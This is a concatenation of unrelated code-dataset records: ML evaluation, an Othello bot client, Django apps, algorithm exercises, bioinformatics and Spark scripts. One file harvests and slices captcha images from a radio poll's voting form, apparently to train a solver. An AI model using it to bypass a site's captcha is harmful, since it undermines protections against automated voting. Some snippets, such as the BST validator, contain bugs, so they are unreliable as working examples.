TBertS(BertConfig(), args.code_bert)\n if args.model_path and os.path.exists(args.model_path):\n model_path = os.path.join(args.model_path, MODEL_FNAME)\n model.load_state_dict(torch.load(model_path))\n\n logger.info(\"model loaded\")\n start_time = time.time()\n test_examples = load_examples(args.data_dir, data_type=\"test\", model=model, overwrite=args.overwrite,\n num_limit=args.test_num)\n m = test(args, model, test_examples)\n exe_time = time.time() - start_time\n m.write_summary(exe_time)\n logger.info(\"finished test\")\n","sub_path":"code_search/single/single_eval.py","file_name":"single_eval.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"361361881","text":"from random import randint, choice\nimport math\nimport socketio\nfrom copy import deepcopy\nimport numpy as np\n\ntileRep = ['_', 'X', 'O'],\nN = 8\n\nred_flag = 0\n\nsio = socketio.Client()\n\npointBoard = [24, 3, 3, 3, 3, 3, 3, 24,\n 3, -12, -2, -2, -2, -2, -12, 3,\n 3, -2, 1, 1, 1, 1, -2, 3,\n 3, -2, 1, 1, 1, 1, -2, 3,\n 3, -2, 1, 1, 1, 1, -2, 3,\n 3, -2, 1, 1, 1, 1, -2, 3,\n 3, -12, -2, -2, -2, -2, -12, 3,\n 24, 3, 3, 3, 3, 3, 3, 24]\n\n\ndef ix(row,col):\n print(row)\n print(col)\n print('abcdefgh'.index(col))\n return (row-1) * N + 'abcdefgh'.index(col)\n\ndef humanBoard(board):\n result = ' A B C D E F G H'\n for i in range(len(board)):\n print(\"i:{}\".format(i))\n if(i % N == 0):\n result += '\\n\\n' + str((int(math.floor(i / N)) + 1)) + ' '\n\n result += ' ' + str(tileRep[board[i % 2]]) + ' '\n print(result)\n return result\n\ndef validateHumanPosition(position):\n validated = len(position) == 2\n if(validated):\n row = int(position[0])\n col = position[1].lower()\n return (1 <= row and row <= N) and ('abcdefgh'.index(col) >= 0)\n return False\n\n##def max_value(position):\n## mv = float(\"-inf\")\n## for child in position:\n## value_eval = max_value(child)\n## mv = max(mv,value_eval)\n## return mv\n##\n##def min_value(position):\n## mv = float(\"inf\")\n## for child in position:\n## value_eval = min_value(child)\n## mv = min(mv,value_eval)\n## return mv\n##\n\ndef player1_score(board):\n player1total=board.count(1)\n return player1total\n\ndef player2_score(board):\n player2total=board.count(2)\n return player2total\n\n\ndef possible_moves(board,player):\n move_list = []\n for i in range(0,64):\n if board[i] == player:\n #moverse a la izquierda\n if i % 8 > 1:\n if board[i-1] != player and board[i-1] != 0:\n if(board[i-2] == 0):\n move_list.append(i-2)\n # moverse a la derecha\n if i % 8 < 6:\n if board[i+1] != player and board[i+1] !=0:\n if(board[i+2] == 0):\n move_list.append(i+2)\n #moverse hacia arriba\n if i > 15:\n if board[i-8] != player and board[i-8] !=0:\n if(board[i-16] == 0):\n move_list.append(i-16)\n #moverse hacia abajo\n if i < 48:\n if board[i+8] != player and board[i+8] !=0:\n if(board[i+16] == 0):\n move_list.append(i+16)\n return move_list\n\ndef inside_board(position):\n if position < 64 and position >= 0:\n return True\n else:\n return False\n\n#no es completamente correcto pero esta simplificado\ndef possible_moves_reworked(board,player):\n if player == 1:\n enemy = 2\n elif player ==2:\n enemy = 1\n move_list = []\n\n for i in range(0,64):\n if board[i] == enemy:\n # derecha\n if(inside_board(i+1) and board[i+1] == 0):\n move_list.append(i+1)\n # izquierda\n if(inside_board(i-1) and board[i-1] == 0):\n move_list.append(i-1)\n # arriba\n if (inside_board(i - 8) and board[i - 8] == 0):\n move_list.append(i-8)\n # abajo\n if (inside_board(i + 8) and board[i + 8] == 0):\n move_list.append(i + 8)\n\n return move_list\n\n\ndef enemy_moves(board, player):\n move_list = []\n\n for i in range(0, 64):\n if board[i] == player:\n # derecha\n if(inside_board(i+1) and board[i+1] == 0):\n move_list.append(i+1)\n # izquierda\n if(inside_board(i-1) and board[i-1] == 0):\n move_list.append(i-1)\n # arriba\n if (inside_board(i - 8) and board[i - 8] == 0):\n move_list.append(i-8)\n # abajo\n if (inside_board(i + 8) and board[i + 8] == 0):\n move_list.append(i + 8)\n return move_list\n\ndef create_all_moves(initial_board, current_player):\n current_player_moves = possible_moves_reworked(initial_board,current_player)\n next_moves = []\n for player_move in current_player_moves:\n next_board = deepcopy(initial_board)\n next_board[player_move] = current_player\n next_moves.append(next_board)\n return next_moves\n\n\ndef create_scores(next_moves,scoreboard):\n possible_scores = []\n print(\"next moves : {}\".format(next_moves))\n for move in next_moves:\n move_prime = np.array(move)\n scoreboard = np.array(scoreboard)\n calculate_score = (move_prime * scoreboard)\n calculate_score = calculate_score.sum()\n possible_scores.append(calculate_score)\n return possible_scores\n\n\n\ndef minimax(depth, nodeIndex, player, board, alpha, beta):\n if depth == 1:\n print(\"nodeIndex: {}\".format(nodeIndex))\n return board[nodeIndex]\n\n if player == 1:\n best = float(\"-inf\")\n for i in range(0,2):\n val = minimax(depth + 1, nodeIndex * 2 + i, 2, board, alpha, beta)\n best = max(best,val)\n alpha = max(alpha, best)\n if beta <= alpha:\n break\n return best\n\n else:\n best = float(\"inf\")\n for i in range(0,2):\n val = minimax(depth + 1, nodeIndex * 2 + i, 1, board, alpha, beta)\n best = min(best, val)\n beta = min(beta,best)\n if beta <= alpha:\n break\n return best\n\n@sio.on('connect')\ndef on_connect():\n print(\"Conectado: {}\".format(userName))\n sio.emit('signin',{ 'user_name': userName, 'tournament_id': tournamentID, 'user_role': 'player' })\n\n@sio.on('ready')\ndef on_ready(data):\n global red_flag\n row_generator = []\n full_board = []\n print(\"About to move. Board:\\n\")\n print('player_turn: {}'.format(data['player_turn_id']))\n print(data['board'])\n print(\"score: {}\".format(player1_score(data['board'])))\n #for i in range(len(data['board'])):\n # if(i % 8 == 0 and i!=0 ):\n # print(\"\\n\")\n #print(data['board'],end=\"\")\n #print(\"\\n\")\n \n #movement = \"\"\n list_of_cols = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n list_of_cols1 = ['C', 'D', 'E','F']\n \n #movement = randint(0,63)\n\n #calcular todas las jugadas\n all_moves = create_all_moves(data['board'],data['player_turn_id'])\n \n scores = create_scores(all_moves, pointBoard)\n\n print(\"scores: {}\".format(scores))\n\n if(len(scores) > 1):\n alpha_beta = minimax(0, 0, data['player_turn_id'], scores, float(\"-inf\"), float(\"inf\"))\n wheretomove = scores.index(alpha_beta)\n else:\n #solo 1 jugada\n wheretomove = 0\n\n #if red_flag == wheretomove:\n #print(\"hello there general kenobi\")\n #dont pick this\n # scores[wheretomove] = float(\"inf\")\n # alpha_beta = minimax(0, 0, data['player_turn_id'], scores, float(\"-inf\"), float(\"inf\")) \n # wheretomove = scores.index(alpha_beta)\n\n #print(\"red_flag: {0}, wheretomove: {1}\".format(red_flag,wheretomove))\n #red_flag = wheretomove\n \n #wheretomove = scores.index(scores.choice())\n \n\n playerwillmove = possible_moves_reworked(data['board'],data['player_turn_id'])\n\n if(playerwillmove):\n print(\"wheretomove: {}\".format(wheretomove))\n movement = playerwillmove[wheretomove]\n else:\n movement = randint(0,64)\n \n if red_flag == wheretomove:\n print(\"hello there general kenobi\")\n if(playerwillmove):\n movement = choice(playerwillmove)\n else:\n movement = randint(0,64)\n \n\n print(\"red_flag: {0}, wheretomove: {1}\".format(red_flag,wheretomove))\n red_flag = wheretomove\n \n\n #pop si no es una movida que se pueda realizar\n #scores.pop(wheretomove)\n\n print(\"movement: {}\".format(movement))\n #while(not(validateHumanPosition(movement))):\n # movement = str(randint(3,6)) + choice(list_of_cols1)\n \n\n sio.emit('play', {'player_turn_id': data['player_turn_id'], 'tournament_id': tournamentID, 'game_id': data['game_id'], 'movement': movement} )\n\n@sio.on('finish')\ndef on_finish(data):\n print(\"Game {} has finished\".format(data['game_id']))\n print(\"ready to play again\")\n\n sio.emit('player_ready', {'tournament_id': tournamentID, 'game_id': data['game_id'], 'player_turn_id': data['player_turn_id'] })\n\n\n#sio.connect('http://192.168.88.253:4000')\n#sio.connect('http://192.168.1.127:4000')\nsio.connect('http://localhost:4000')\nuserName = 'Cristian' \ntournamentID = 142857\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"198517622","text":"from bisect import bisect_right\nimport sys\ninput = sys.stdin.buffer.readline\n\nclass BIT:\n def __init__(self, size):\n self.size = size\n self.tree = [0] * (size + 1)\n\n def add(self, index):\n while index <= self.size:\n self.tree[index] += 1\n index += index & (-index)\n\n def sum(self, index):\n ret = 0\n while index:\n ret += self.tree[index]\n index -= index & (-index)\n return ret\n\n def search(self, value):\n i = 0\n s = 0\n step = 1 << (self.size.bit_length() - 1)\n while step:\n if i + step <= self.size and s + self.tree[i + step] < value:\n i += step\n s += self.tree[i]\n step //= 2\n return i + 1\n\nN, K = map(int, input().split())\nA = [int(input()) - K for _ in range(N)]\n\naccA = [0] * (N + 1)\nfor i, a in enumerate(A, start=1):\n accA[i] = accA[i - 1] + a\n\nsToI = {s: i for i, s in enumerate(sorted(list(set(accA))))}\ntree = BIT(len(sToI))\n\nans = 0\nfor a in map(lambda a: sToI[a] + 1 ,accA):\n ans += tree.sum(a)\n tree.add(a)\nprint(ans)\n","sub_path":"AtCoder/arc/075e.py","file_name":"075e.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"287277054","text":"import pyscreenshot as ImageGrab\nimport time\nfrom selenium import webdriver\nimport image_slicer\nfrom PIL import Image\n\n\nloops = 100\ncount = 0\n\ndef collect(loops):\n\n\n pref = loops\n\n options = webdriver.FirefoxOptions()\n options.add_argument(\"--start-maximized\")\n\n\n\n driver = webdriver.Firefox(firefox_options=options)\n driver.get(\"https://www.rtvutrecht.nl/formulier/top100/\")\n driver.maximize_window()\n driver.execute_script(\"window.scrollTo(0, 500)\")\n\n\n time.sleep(1)\n\n bound_laptop = \"nothing\"\n bound_desktop = (2337,520,2385,538)\n\n im = ImageGrab.grab(bbox=(661,487,709,505)).convert('RGB')\n\n im.save(\"captcha_full.png\")\n bg = Image.open(\"bg.png\").convert('LA')\n\n\n for x in range (1,7):\n x_bound = (x-1) * 8\n\n crop = im.crop((x_bound,0,x_bound + 8,18))\n name = \"slice_\" + str(loops) + str(x) + \".png\"\n print(name)\n\n back_im = bg.copy()\n back_im.paste(crop, (10,5))\n back_im.save(\"collected/\" + name)\n\n\n driver.close()\n\n\nwhile count <= loops:\n collect(count)\n count += 1\n","sub_path":"data/training_data/raw2/captcha_collector.py","file_name":"captcha_collector.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"116634823","text":"from django.contrib import admin\nfrom .models import Artist, Song, Pick, Comment, Boi\n\n\nclass ArtistInline(admin.TabularInline):\n model = Song\n extra = 0\n show_change_link = True\n\nclass ArtistAdmin(admin.ModelAdmin):\n # fieldsets = [\n # (None, {'fields': ['question_text']}),\n # ('Date information', {'fields': ['pub_date'], 'classes': ['collapse']}),\n # ]\n inlines = [ArtistInline]\n list_select_related = True\n\n\nclass SongInline(admin.TabularInline):\n model = Pick\n extra = 0\n show_change_link = True\n\nclass SongAdmin(admin.ModelAdmin):\n # fieldsets = [\n # (None, {'fields': ['question_text']}),\n # ('Date information', {'fields': ['pub_date'], 'classes': ['collapse']}),\n # ]\n list_filter = ('artist__full_name',)\n inlines = [SongInline]\n\nadmin.site.register(Artist, ArtistAdmin)\nadmin.site.register(Song, SongAdmin)\nadmin.site.register(Pick)\nadmin.site.register(Comment)\nadmin.site.register(Boi)\n","sub_path":"akkordbase/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"144007085","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a boolean\n def isValidBST(self, root):\n if root==None: return True\n self.last = None\n self.validate = True\n\n self.in_order(root)\n\n return self.validate\n\n def in_order(self, node):\n if not self.validate: return\n\n if node.left!=None:\n self.in_order(node.left)\n\n if self.last!=None and node.val<=self.last.val:\n self.validate=False\n return\n\n self.last=None\n\n if node.right!=None:\n self.in_order(node.right)\n","sub_path":"Leetcode/Validate_Binary_Search_Tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"255700054","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('solutions', '0003_solution_solution_type'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='solutionmedia',\n options={'ordering': ('order', 'id')},\n ),\n migrations.AlterField(\n model_name='solution',\n name='title',\n field=models.CharField(help_text=b'Public facing title that goes on cube.', max_length=255, null=True, blank=True),\n ),\n ]\n","sub_path":"solutions/migrations/0004_auto_20151123_2033.py","file_name":"0004_auto_20151123_2033.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456721449","text":"'''\nCreated on 14.08.2012\n\n@author: apollov\n'''\nimport datetime\nfrom datetime import date\nfrom django.views.generic import TemplateView\nfrom django.shortcuts import redirect\nfrom apps.galleries.models import ImageGallery, VideoGallery, IndexSlider\nfrom apps.promoblock.models import Promoblock\nfrom apps.calendarworks.models import Calendarwork, Day\nfrom apps.catalogues.models import PrimaryProduct, Category\nfrom apps.news.models import Article\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom apps.news.forms import SubscriberForm\nfrom apps.faq.forms import FaqForm\n\n\nclass MainView(TemplateView):\n template_name = 'phart/main.html'\n\n def dispatch(self, *args, **kwargs):\n # check if there is some video onsite\n if args[0].LANGUAGE_CODE != 'ru':\n return redirect('/{lang}/about/about/'.format(lang=args[0].LANGUAGE_CODE))\n else:\n return super(MainView, self).dispatch(args[0], *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n today = datetime.datetime.now()\n try: \n day = Day.objects.get(date=date.today)\n except ObjectDoesNotExist:\n day = None \n return {\n 'day': day,\n 'categories': Category.objects.filter(published=True).order_by('sorting_order'),\n 'products': PrimaryProduct.objects.filter(published=True),\n 'month': Calendarwork.objects.get(month=today.strftime('%m')),\n 'promoblock': Promoblock.objects.get(type=1),\n 'articles': Article.objects.filter(is_shown_on_main_page=True).order_by('-date_time')[:2],\n 'main': 1,\n 'video_gallery': VideoGallery.objects.filter(gallery_type=3)[0],\n 'image_gallery': ImageGallery.objects.prefetch_related('image_set').filter(gallery_type=2)[0] if ImageGallery.objects.exists() else None,\n 'image_gallery_videos': VideoGallery.objects.prefetch_related('video_set').filter(gallery_type=5)[0] if VideoGallery.objects.exists() else None,\n 'image_slider': IndexSlider.objects.order_by('sorting_order'),\n 'form': FaqForm()\n }\n\nmain_view = MainView.as_view()\n","sub_path":"phart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"161249324","text":"import os\nimport re\nimport csv\nimport argparse\n\n\n# Complete path function\nclass CompletePath(argparse.Action):\n\t\"\"\"give the full path of an input file/folder\"\"\"\n\tdef __call__(self, parser, namespace, values, option_string=None):\n\t\tsetattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))\n\n\ndef get_args():\n\tparser = argparse.ArgumentParser(\n\t\tdescription=\"Get the distance to center of each extracted SNP\",\n\t\tformatter_class=argparse.ArgumentDefaultsHelpFormatter\n\t)\n\tparser.add_argument(\n\t\t\"--logfile\",\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\thelp=\"The screen output from the SNP extraction script as a text file\"\n\t)\n\tparser.add_argument(\n\t\t\"--length_info\",\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\thelp=\"supply a file that contains the locus name and the length of the locus (each in a separate line) for all alignments of interest\"\n\t)\n\tparser.add_argument(\n\t\t\"--output\",\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\thelp=\"where to store the results (dir)\"\n\t)\n\tparser.add_argument(\n\t\t'--multi_snp',\n\t\taction='store_true',\n\t\tdefault=False,\n\t\thelp='Use this flag if you extracted all snps (not only one per locus)'\n\t)\n\treturn parser.parse_args()\n\nargs = get_args()\nsnp_logfile = args.logfile\nlength_log = args.length_info\noutdir = args.output\n\n\n# get extracted positions\n\nlogfile = open(snp_logfile,'r')\nalignments = []\nextracted_positions = []\nif args.multi_snp:\n\tfor line in logfile:\n\t\tif line.startswith('processing file:'):\n\t\t\talignment = line.split(':')[1]\n\t\t\talignment = re.sub('\\s+', '', alignment)\n\t\t\talignments.append(alignment)\n\t\telif line.startswith(\"['\"):\n\t\t\tpass\n\t\telif line.startswith(\"[]\"):\n\t\t\tpass\n\t\telif line.startswith(\"[\"): \n\t\t\tline = line.rstrip()\n\t\t\tpos = re.sub('[\\[\\]]','',line)\n\t\t\textracted_positions.append(pos)\n\t\telif line.startswith('no SNP extraction performed'):\n\t\t\tpos = 'NA'\n\t\t\textracted_positions.append(pos)\nelse:\t\n\tfor line in logfile:\n\t\tif line.startswith('processing file:'):\n\t\t\talignment = line.split(':')[1]\n\t\t\talignment = re.sub('\\s+', '', alignment)\n\t\t\talignments.append(alignment)\n\t\telif line.startswith('sampling position'):\n\t\t\tpos = line.split(' ')[-1]\n\t\t\tpos = pos.rstrip()\n\t\t\textracted_positions.append(pos)\n\t\telif line.startswith('no SNP extraction performed'):\n\t\t\tpos = 'NA'\n\t\t\textracted_positions.append(pos)\n#make a dicitonary from the two lists\nal_pos_dict = {}\nfor al in alignments:\n\tindex = alignments.index(al)\n\tal_pos_dict.setdefault(al,extracted_positions[index])\n\n\n\n# get alignment lengths\n\nlengthfile = open(length_log,'r')\nl_alignments = []\nlength_list = []\nfor line in lengthfile:\n\tif line.startswith('uce-'):\n\t\tl_alignments.append(line.rstrip())\n\telse:\n\t\tlength_list.append(line.rstrip())\n#make a dicitonary form the two lists\nal_length_dict = {}\nfor al in l_alignments:\n\tindex = l_alignments.index(al)\n\tal_length_dict.setdefault(al,length_list[index])\n\n\n\n# now calculate the distance to the center for each variable position\ndist_count_dict = {}\nfor al in al_length_dict:\n\tlength = al_length_dict[al]\n\textracted = al_pos_dict[al]\n\tcenter = int(length)/2\n\tvar_pos_list = al_pos_dict[al].split(', ')\n\tfor pos in var_pos_list:\n\t\tdist = ''\n\t\tif not pos == 'NA':\n\t\t\tpos = int(pos)\n\t\t\tif pos > center:\n\t\t\t\tdist = pos-center\n\t\t\telif pos < center:\n\t\t\t\tdist = center-pos\n\t\t\telse:\n\t\t\t\tdist = 0\n\t\telse:\n\t\t\tcontinue\n\t\tif dist in dist_count_dict:\n\t\t\tdist_count_dict[dist] += 1\n\t\telse:\n\t\t\tdist_count_dict.setdefault(dist,1)\n\ndist_count = open(\"%s/distance_to_center_count.txt\" %outdir, \"wb\")\ndist_count_log=csv.writer(dist_count, delimiter='\\t')\nfor key in dist_count_dict:\n\tdist_count_log.writerow([key,dist_count_dict[key]])\n#input file = log file from snp extraction script\n#alignment-varpos-dict = transform file into dict, with name of locus as key and extracted variable positions as value(s)\n#alignment-length-dict = transform file into dict, every first line is key and every second is value\n#distance_to_center-count-dict = {}\n#for alignment, length in alignment-lenth-dict:\n#\tcenter = length/2\n#\tvarpos = alignment-varpos-dict[alignment]\n# \tfor position in varpos:\n#\t\tdist = ''\n#\t\tif position > center:\n#\t\t\tdist = position - center\n# \t\telif position < center: \n#\t\t\tdist = center-position\n# \t\telse:\n#\t\t\tdist = 0\n#\t\tif dist in distance_to_center-count-dict:\n#\t\t\tdistance_to_center-count-dict[dist] +1\n#\t\telse:\n#\t\t\tdistance_to_center-count-dict.setfault(dist,1)\n# write distance_to_center-count-dict into tab delimited file\n# key /t value","sub_path":"summary_stats/snps/bin/get_snp_stats.py","file_name":"get_snp_stats.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105851765","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# 高阶函数\n# 高阶函数至少要符合以下两个特点之一\n# 接受一个或者多个函数作为参数\n# 将函数作为返回值返回\n\n\n# 匿名函数\n# 语法 lambda 参数列表: 返回值\ndef fn(x):\n return x\n\n\n# 等价于 fn = lambda x: x\n\n\n# filter() 函数\n# 过滤掉不符合条件的元素,返回一个迭代器对象\n# 参数:\n# 1.函数\n# 2.可迭代的结构\n\nls = [1, 2, 3, 4, 5, 6]\ns = list(filter(lambda item: item % 2 == 0, ls))\nprint(s)\n\n# map() 函数\n# 对迭代对象中的所有元素做指定的操作,返回一个迭代器对象\ns = list(map(lambda item: item*2, ls))\nprint(s)\n\n# sorted(iterable, key=None, reverse=False) 函数\n# 对迭代对象排序操作\n# 参数 1. 迭代对象 2. 函数 3. 升序False 降序True\nls = [2, \"0\", 1]\ns = sorted(ls, key=int, reverse=False)\nprint(s)\n\n# ls.sort(key=None, reverse=False)\n# 会修改原来的list\nls.sort(key=int, reverse=False)\nprint(ls)\n","sub_path":"基础语法/5-6章/07_高阶函数.py","file_name":"07_高阶函数.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"633369582","text":"#Programa que compara dos numeros, usamos la funciones para lograr este apartado\nprint(\"Programa que compara dos numeros\")\nprint()\nprint(\"Condiciones: \\n Si el primer numero ingresado es mayor que el segundo devuelve el valor 1\"\n \"\\n Si el segundo valor es mas grande que el primero devuelve -1 \"\n \"\\n Si los dos numeros son iguales devuelve 0\")\nprint()\na=0\na=0\ndef relacion(a,b):\n if a>b:\n print(\"1\")\n elif alife_expectancy*0.9):\n numb= random.randint(0,100)\n if numb>10:\n return False\n if(self.age>life_expectancy*0.8):\n numb= random.randint(0,100)\n if numb>20:\n return False\n return True\n\n\n","sub_path":"ZooToLife/animal.py","file_name":"animal.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533637126","text":"\"\"\"\nAuthor: Rajiv Malhotra\nProgram: HourlyEmployee.py\nDate: 11/08/2020\n\nHourly Employee class definition\n\"\"\"\n\nfrom datetime import date\n\n\nfrom Employee import Employee\n\nclass HourlyEmployee(Employee):\n \"\"\" Hourly Employee Class\"\"\"\n #Contructor\n def __init__(self, lname, fname, address, pnum, start_dt, hourly_pay):\n super().__init__(lname, fname, address, pnum) # calls the base constructor\n self.start_dt = start_dt\n self.hourly_pay = hourly_pay\n\n @property\n def start_dt(self):\n return self._start_dt\n\n @start_dt.setter\n def start_dt(self, value):\n self._start_dt = value\n\n @property\n def hourly_pay(self):\n return self._hourly_pay\n\n @hourly_pay.setter\n def hourly_pay(self, value):\n if not isinstance(value, float):\n raise ValueError\n self._hourly_pay = value\n\n def give_raise(self, new_hourly_pay):\n \"\"\" Function for hourly_pay raise \"\"\"\n if new_hourly_pay <= self.hourly_pay:\n raise ValueError(\"Pay raise cannot be less than current rate\")\n self.hourly_pay = new_hourly_pay\n\n def display(self):\n return Employee.display(self) + \", \" + str(self.start_dt) + \", $\" + str(self.hourly_pay) + \"/hr\"\n\n#Drivers\ntry:\n hourly_employee = HourlyEmployee('Doe', 'John', '', '515-222-2222', date.today(), 10.00)\n print(hourly_employee.display())\n hourly_employee.give_raise(12.00)\n print(hourly_employee.display())\nexcept ValueError as err:\n print(err)\n\ndel hourly_employee\n","sub_path":"HourlyEmployee.py","file_name":"HourlyEmployee.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352356807","text":"\"\"\"\r\n Download the data file from the above location and make it accessible to Spark.\r\n Source: https://raw.githubusercontent.com/stedy/Machine-Learning-with-R-datasets/master/groceries.csv\r\n Task2: min, max prices and row count\r\n\"\"\"\r\n\r\nfrom pyspark.sql import SparkSession\r\nimport time\r\nimport logging\r\nimport sys\r\nimport os\r\n\r\n\r\ndef spark_init(app_Name):\r\n \"\"\"\r\n Spark session initialization\r\n :return: spark_session\r\n \"\"\"\r\n return SparkSession.builder.appName(app_Name).enableHiveSupport().getOrCreate()\r\n\r\n\r\ndef products_prefix(word):\r\n return \"Product :\" + word\r\n\r\n\r\ndef read_transform(spark, path):\r\n \"\"\"\r\n Load file and return rdd\r\n :return:\r\n \"\"\"\r\n rdd = spark.sparkContext.textFile(path)\r\n flat_rdd = rdd.flatMap(lambda rec: rec.split(',')).filter(lambda rec: rec != ' ')\r\n dist_rdd = flat_rdd.distinct().map(lambda rec: products_prefix(rec))\r\n return dist_rdd\r\n\r\n\r\ndef save_txt(rdd):\r\n \"\"\"\r\n Save to desired output\r\n :param rdd:\r\n :return:\r\n \"\"\"\r\n rdd.coalesce(1).saveAsTextFile(\"C:/Users/DSR/PycharmProjects/truata_code_challenge/tmp/task_1\")\r\n os.rename(\"C:/Users/DSR/PycharmProjects/truata_code_challenge/tmp/task_1/part-00000\",\r\n \"C:/Users/DSR/PycharmProjects/truata_code_challenge/out/out_1_2a.txt\")\r\n\r\n\r\nif __name__ == '__main__':\r\n start_time = time.time()\r\n log = logging.getLogger(\"TASK_1_2\")\r\n logging.basicConfig(level=logging.INFO)\r\n\r\n file_path = \"C:/Users/DSR/PycharmProjects/truata_code_challenge/input/groceries.csv\"\r\n # Initiate spark session\r\n log.info(\" TASK_1_2 Program Started\")\r\n try:\r\n spark = spark_init(\"Truta: TASK_1_2\")\r\n\r\n # Read and transform Source data\r\n rdd = read_transform(spark, file_path)\r\n\r\n # Save desired output\r\n save_txt(rdd)\r\n\r\n log.info(\" TASK_1_2 : Files saved successfully\")\r\n\r\n except Exception as e:\r\n log.info(\" Exception: {}\".format(str(e)))\r\n sys.exit(1)\r\n else:\r\n hours, rem = divmod(time.time() - start_time, 3600)\r\n mins, secs = divmod(rem, 60)\r\n log.info(\"*** TASK_1_2 Completed Successfully in : [{:0>2}hrs:{:0>2}mins:{:05.2f}secs ] ***\"\r\n .format(int(hours), int(mins), secs))\r\n sys.exit(0)\r\n","sub_path":"src/task_1_2.py","file_name":"task_1_2.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"624281227","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 5 13:43:28 2018\r\n\r\n@author: User\r\n\"\"\"\r\n\r\ndef drawfn(s, n):\r\n i=n\r\n for i in reversed(range(n+1)):\r\n if i != 0:\r\n# print(i)\r\n print(s*i)\r\n if i ==0:\r\n print('='*10, end = \"\")\r\n for i in range(n+1):\r\n print(s*i)\r\n\r\ndrawfn('*',6)\r\ndrawfn('$',1)","sub_path":"Py exercises/03_04_alternate.py","file_name":"03_04_alternate.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360204508","text":"###\n#\n# Homework 20.2 - GitHub login\n#\n###\n\nimport json\n\nfrom flask import Flask, render_template, request, redirect, url_for, make_response\nfrom requests_oauthlib import OAuth2Session\nimport os\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/github/login\")\ndef github_login():\n # prepare the GitHub OAuth session\n github = OAuth2Session(os.environ.get(\"GITHUB_CLIENT_ID\"))\n # GitHub authorization URL\n authorization_url, state = github.authorization_url(\"https://github.com/login/oauth/authorize\")\n # redirect user to GitHub for authorization\n response = make_response(redirect(authorization_url))\n # for CSRF purposes\n response.set_cookie(\"oauth_state\", state, httponly=True)\n return response\n\n\n@app.route(\"/github/callback\")\ndef github_callback():\n github = OAuth2Session(os.environ.get(\"GITHUB_CLIENT_ID\"), state=request.cookies.get(\"oauth_state\"))\n token = github.fetch_token(\"https://github.com/login/oauth/access_token\",\n client_secret=os.environ.get(\"GITHUB_CLIENT_SECRET\"),\n authorization_response=request.url)\n response = make_response(redirect(url_for('profile'))) # redirect to the profile page\n response.set_cookie(\"oauth_token\", json.dumps(token), httponly=True)\n return response\n\n\n@app.route(\"/profile\")\ndef profile():\n if request.cookies.get(\"oauth_token\"):\n github = OAuth2Session(os.environ.get(\"GITHUB_CLIENT_ID\"), token=json.loads(request.cookies.get(\"oauth_token\")))\n github_profile_data = github.get('https://api.github.com/user').json()\n return render_template(\"profile.html\", github_profile_data=github_profile_data)\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/github/logout\")\ndef logout():\n response = make_response(redirect(url_for('index'))) # redirect to the index page\n response.set_cookie(\"oauth_token\", expires=0) # delete the oauth_cookie to logout\n return response\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"les202/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168454109","text":"import re\r\nfrom itertools import permutations\r\n\r\n\r\n_DICT = dict() # Main dictionary.\r\ndict_search = dict() # Search results.\r\ndict_regex = dict() # Regex results.\r\n\r\nALPHABET = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n\r\n\r\ndef import_dict(table_out, read_file):\r\n \"\"\"\r\n Imports a dictionary file, reads its contents and inserts them in an\r\n organised dict.\r\n\r\n :param table_out: Dict to write to.\r\n :param read_file: 